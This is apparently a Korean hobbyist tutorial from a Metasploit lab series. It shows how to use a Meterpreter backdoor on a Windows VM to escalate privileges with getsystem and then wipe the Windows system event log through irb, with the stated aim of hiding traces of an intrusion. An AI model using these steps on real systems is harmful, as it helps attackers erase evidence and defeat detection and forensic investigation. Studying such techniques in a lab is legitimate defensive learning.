해커에게 가장 중요한것이 무엇일까..
공격해서 정보를 빼내는 것도 중요하겠지만
침투한 흔적을 지우는일이 가장 중요하지 않을까...
Metasploit 기능중에 로그를 지우는 기능도 있다
일단 침투를 하고 나서 나오기전 지우면 될꺼같다
(5)에서 침투한 windows 백도어를 이용해보자
컨트롤 + 알트 (VMware의 호스트키) 눌러서 Kali에서 나온 후 윈도우 키 + R(윈도우 실행창) 을 누른다
control (제어판)을 입력하고 엔터
ㅋㅋㅋ별거없다 제어판 여는거였다
관리 도구에 들어가자
이벤트 뷰어로 들어가자
여러 로그가 기록 되어있다
Kali로 다시 돌아와서
getsystem
getsystem -h
getsystem 0
권한 상승하고
irb를 입력한다
log=client.sys.eventlog.open('system')
log.clear
입력
로그를 지웠다
다시 윈도우 로그를 확인해보면 지워져있는걸 볼수 있다.